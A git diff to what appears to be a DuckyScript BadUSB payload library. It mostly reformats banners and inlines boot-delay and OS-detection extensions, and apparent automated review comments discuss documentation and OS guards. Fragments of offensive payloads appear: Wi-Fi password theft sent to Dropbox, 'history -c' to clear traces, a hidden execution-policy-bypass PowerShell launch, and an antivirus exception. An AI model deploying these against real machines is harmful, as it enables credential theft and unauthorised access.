diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt index bb5b1b6..3186ee3 100644 --- a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt +++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt @@ -1,27 +1,53 @@ -REM ####################################################### -REM # | -REM # Title : Exfiltrate Wifi Passwords - Linux | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration, Credentials, Execution | -REM # Target : Linux | -REM # | -REM ####################################################### +REM_BLOCK +####################################################### +# # +# Title : Exfiltrate Wifi Passwords - Linux # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration, Credentials, Execution # +# Target : Linux # +# # +####################################################### +END_REM REM Requirements: REM - Permissions REM - Internet connection REM - Dropbox Token -DELAY 1000 +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + CTRL-ALT t DELAY 2000 - REM #### PREREQUISITES SECTION #### - - REM Required: You need to know the sudo password and replace 'example' with this DEFINE SUDO_PASS example STRING sudo su 
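Review bot: The inlined DETECT_READY block sends real CAPSLOCK key presses to the host at start-up, and nothing in this payload's `REM Requirements:` section records that side effect. With `#RESPONSE_DELAY 25` and `#ITERATION_LIMIT 120` the loop can issue up to 120 presses before the closing `CAPSLOCK`, so a host that never reflects the LED sees a run of Caps Lock events lasting about three seconds right after the keyboard enumerates. I would add a line such as `REM Note: DETECT_READY toggles CAPSLOCK on the host while waiting (up to 120 presses, ~3000ms)` next to the requirements; it also tells defenders reading the library what this start-up sequence looks like in HID or input logs. The same block is inlined in the ChangeMacAddress_Linux, ChangeNetworkConfiguration_Linux, Defend_yourself_against_AtlasVPN_Bug-Door, Edit_The_Default_Real_App_With_An_Arbitrary, ExploitingAnExecutableFile, Persistent_Keylogger-Telegram_Based and Persistent_Reverse_Shell-Telegram_Based hunks.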
@@ -41,8 +67,6 @@ ENTER REM #### ZIP SECTION #### - - DELAY 500 STRING RANDOM=$(shuf -i 1-999999999999 -n 1) ENTER @@ -61,8 +85,6 @@ ENTER REM #### WiFi && ZIP SECTION #### - - REM Get all WiFi data STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do ENTER @@ -85,8 +107,6 @@ DELAY 3000 REM #### EXFILTRATE SECTION #### - - REM Set yout Dropbox folder name DEFINE DROPBOX_FOLDER_NAME example STRING DROPBOX_FOLDER="/ @@ -105,8 +125,6 @@ ENTER REM #### REMOVE TRACES #### - - DELAY 2000 STRING history -c ENTER diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt index 379fe45..4b92997 100644 --- a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt +++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt 
@@ -10,8 +10,49 @@ REM # | REM ################################################################### +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION -DELAY 2000 GUI r DELAY 250 STRING powershell -w h -ep bypass $discord=' diff --git a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt index 550a2c5..c4b9907 100644 --- a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt +++ b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt 
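Review bot: `$_OS` is computed by the inlined PASSIVE_WINDOWS_DETECT block, but nothing visible after `END_EXTENSION` reads it, so `GUI r` and the keystrokes that follow are typed whatever the detection result was. The extension's own `EXAMPLE USAGE AFTER EXTENSION` text shows the intended guard; wrapping the body in `IF ($_OS == WINDOWS) THEN` … `END_IF` would keep a Windows-only payload from typing into a host it was not written for. The payload body continues past the end of this hunk, so a guard further down cannot be ruled out from here. The same pattern appears in the Add_An_Excepiton_To_Avast_Antivirus, Change_Windows_User_Name, Change_the_password_of_the_windows_user, CloseAllApplicationsInWindows, Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed and Make_Windows_performant_but_ugly_and_boring hunks.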
@@ -1,24 +1,65 @@ -REM ######################################################## -REM # | -REM # Title : Add An Exception To Avast Antivirus | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10/11 | -REM # | -REM ######################################################## - +REM_BLOCK +######################################################## +# # +# Title : Add An Exception To Avast Antivirus # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +######################################################## +END_REM REM Requirements: REM - Avast installed and configured - REM Set the full-path that you want to set as exception DEFINE FULL-PATH example/to/path +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION REM Open Avast application -DELAY 2000 GUI DELAY 1000 STRING avast 
diff --git a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt index a44c42a..10174db 100644 --- a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt +++ b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt @@ -1,13 +1,14 @@ -REM ############################################## -REM # | -REM # Title : Call Someone On An iPhone | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : iPhone | -REM # | -REM ############################################## - +REM_BLOCK +############################################## +# | +# Title : Call Someone On An iPhone | +# Author : Aleff | +# Version : 1.0 | +# Category : Execution | +# Target : iPhone | +# | +############################################## +END_REM REM Requirements: REM - The phone must be unlocked diff --git a/payloads/library/execution/ChangeGitRemoteLink/payload.txt b/payloads/library/execution/ChangeGitRemoteLink/payload.txt index eafac41..0348ece 100644 --- a/payloads/library/execution/ChangeGitRemoteLink/payload.txt +++ b/payloads/library/execution/ChangeGitRemoteLink/payload.txt @@ -1,12 +1,14 @@ -REM ########################################### -REM # | -REM # Title : Change Remote Git Link | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10-11/Linux | -REM # | -REM ########################################### +REM_BLOCK +########################################### +# # +# Title : Change Remote Git Link # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10-11/Linux # +# # +########################################### +END_REM REM Requirements: REM - Internet Connection diff --git a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt index e0c538f..3130f0d 100644 
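Review bot: The rewritten banner in Call_Someone_On_An_iPhone/payload.txt still closes each row with `|`, while the other banners converted in this diff (ChangeGitRemoteLink in the next hunk, for example) close their rows with `#`. For a consistent `REM_BLOCK` header across the library, the rows here would read like `# Title : Call Someone On An iPhone #`. Column alignment cannot be judged from this view because the whitespace is collapsed.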
--- a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt +++ b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt @@ -1,25 +1,50 @@ - -REM ########################################### -REM # | -REM # Title : Change Linux MAC Address | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Linux | -REM # | -REM ########################################### +REM_BLOCK +########################################### +# # +# Title : Change Linux MAC Address # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Linux # +# # +########################################### +END_REM REM Requirements: REM - Permissions -DELAY 1000 +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + CTRL-ALT t DELAY 2000 - REM #### PERMISSIONS SECTION #### - - REM You need to know the sudo password and replace 'example' with this DEFINE SUDO_PASS example diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt index af732aa..60502ad 100644 --- a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt +++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt 
@@ -1,25 +1,49 @@ - -REM ############################################### -REM # | -REM # Title : Change Network Configuration | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Linux | -REM # | -REM ############################################### +REM_BLOCK +############################################### +# # +# Title : Change Network Configuration # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Linux # +# # +############################################### +END_REM REM Requirements: REM - Permissions -DELAY 1000 +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION CTRL-ALT t DELAY 2000 - REM #### PERMISSIONS SECTION #### - - REM Required: You need to know the sudo password and replace 'example' with this DEFINE SUDO_PASS example STRING sudo su diff --git a/payloads/library/execution/Change_Windows_User_Name/payload.txt b/payloads/library/execution/Change_Windows_User_Name/payload.txt index d0d566d..5b1d685 100644 --- a/payloads/library/execution/Change_Windows_User_Name/payload.txt +++ b/payloads/library/execution/Change_Windows_User_Name/payload.txt 
@@ -1,12 +1,14 @@ -REM ############################################# -REM # | -REM # Title : Change Windows User Name | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10/11 | -REM # | -REM ############################################# +REM_BLOCK +############################################# +# # +# Title : Change Windows User Name # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +############################################# +END_REM REM Requirements: REM - Nothing @@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng REM Set the new name that you want to set DEFINE NEW_NAME example +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + REM Open Windows research -DELAY 2000 GUI DELAY 1000 
diff --git a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt index 87e22c8..a85a629 100644 --- a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt +++ b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt @@ -1,12 +1,14 @@ -REM ############################################################ -REM # | -REM # Title : Change the password of the Windows user | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10-11 | -REM # | -REM ############################################################ +REM_BLOCK +############################################################ +# # +# Title : Change the password of the Windows user # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10-11 # +# # +############################################################ +END_REM REM Requirements: REM - Nothing (i know it's absurd) 
@@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd) REM You must define the new Windows user password DEFINE NEW_PASSWORD example -DELAY 1000 +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + GUI x DELAY 500 STRING a diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/README.md b/payloads/library/execution/CloseAllApplicationsInWindows/README.md index 8fb34f0..c512577 100644 --- a/payloads/library/execution/CloseAllApplicationsInWindows/README.md +++ b/payloads/library/execution/CloseAllApplicationsInWindows/README.md @@ -1,4 +1,4 @@ -# Close All Applications - BADUSB ✅ +# Close All Applications A script used to close all target open applications. diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt index 5c1bd2a..eab598e 100644 --- a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt 
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt 
@@ -1,27 +1,69 @@ -REM ##################################################### -REM # | -REM # Title : Close All Applications | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10-11 | -REM # | -REM ##################################################### +REM_BLOCK +##################################################### +# # +# Title : Close All Applications # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10-11 # +# # +##################################################### +END_REM REM Plug-And-Play -REM REM 1. Open a powershell REM 2. Download a Python script REM 3. Execute it REM 4. Remove Python script downloaded REM 5. Delete powershell history -REM REM Reply with YOUR LINK. The Payload should be close_all_app.ps1 DEFINE POWERSHEL_CODE example.com -DELAY 2000 +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + GUI x DELAY 250 DOWNARROW 
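Review bot: The step list kept as context here does not match the define below it: steps 2 and 4 speak of a Python script, while the `REM Reply with YOUR LINK` line expects `close_all_app.ps1`. Since this commit is already tidying the comment block (it drops the empty `REM` separators), the steps could read `REM 2. Download a PowerShell script` and `REM 4. Remove the downloaded script`, and "Reply with" presumably means "Replace with". `POWERSHEL_CODE` is also misspelt, but renaming it would touch its uses further down the payload, which are outside this hunk.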
diff --git a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt index e109d55..0729d4d 100644 --- a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt +++ b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt @@ -1,12 +1,14 @@ -REM ############################################################ -REM # # -REM # Title : Defend yourself against AtlasVPN Bug-Door # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : Execution # -REM # Target : Linux # -REM # # -REM ############################################################ +REM_BLOCK +############################################################ +# # +# Title : Defend yourself against AtlasVPN Bug-Door # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Linux # +# # +############################################################ +END_REM REM Requirements: REM - Administrator Permission @@ -15,7 +17,34 @@ REM - AtlasVPN installed REM Define the sudo user password DEFINE #SUDO-PWS example -DELAY 1000 +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + CTRL-ALT t DELAY 2000 
diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt index 0a863ff..c3c6684 100644 --- a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt +++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt @@ -1,14 +1,14 @@ - -REM ################################################################ -REM # | -REM # Title : Edit The Default Real App With An Arbitrary | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : GNU/Linux (Debian based tested) | -REM # | -REM ################################################################ - +REM_BLOCK +################################################################ +# # +# Title : Edit The Default Real App With An Arbitrary # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : GNU/Linux (Debian based tested) # +# # +################################################################ +END_REM REM Requirements: REM - sudo permissions @@ -16,11 +16,9 @@ REM - Internet connection REM - Executable app REM - '.desktop' file - REM Note: REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it - REM Set the link from wich will be downloaded the zip archive DEFINE ARBITRARY_APP_LINK example 
@@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example REM sudo permissions needed DEFINE SUDO example +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION REM Open a shell -DELAY 2000 CTRL-ALT t DELAY 1000 diff --git a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt index 8aa455d..0d30273 100644 --- a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt +++ b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt 
@@ -1,25 +1,50 @@ - -REM ################################################ -REM # | -REM # Title : Exploiting An Executable File | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Linux | -REM # | -REM ################################################ +REM_BLOCK +################################################ +# # +# Title : Exploiting An Executable File # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Linux # +# # +################################################ +END_REM REM Requirements: REM - Nothing, it is Plug-And-Play but you can change it as you want. -DELAY 1000 +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + CTRL-ALT t DELAY 2000 - REM #### Script #### - - STRINGLN function search_file { for file in "$1"/*; do diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md index 4979471..3929e47 100644 --- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md +++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md @@ -108,18 +108,12 @@ Happy Hacking!
Github - - - - -
Instagram - -
Discord +
Linkedin - + \ No newline at end of file diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt index 80b90cb..3edb530 100644 --- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt +++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt 
@@ -1,27 +1,67 @@ -REM ########################################################################################### -REM # | -REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10/11 | -REM # | -REM ########################################################################################### - +REM_BLOCK +########################################################################################### +# # +# Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +########################################################################################### +END_REM REM Requirements: REM - Nothing - REM Define here your hexadecimal code DEFINE #HEX_CODE example - REM Note: REM - Tested on Windows 11 REM - Running checked but not blocked by Avast antivirus +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. 
+ + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION GUI r DELAY 1000 STRINGLN notepad.exe diff --git a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt index 1ed9ed8..12813ca 100644 --- a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt +++ b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt @@ -1,12 +1,14 @@ -REM ################################################################## -REM # | -REM # Title : Make Windows performant (but ugly and boring) | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Execution | -REM # Target : Windows 10/11 | -REM # | -REM ################################################################## +REM_BLOCK +################################################################## +# # +# Title : Make Windows performant (but ugly and boring) # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +################################################################## +END_REM REM Plug-And-Play <3 
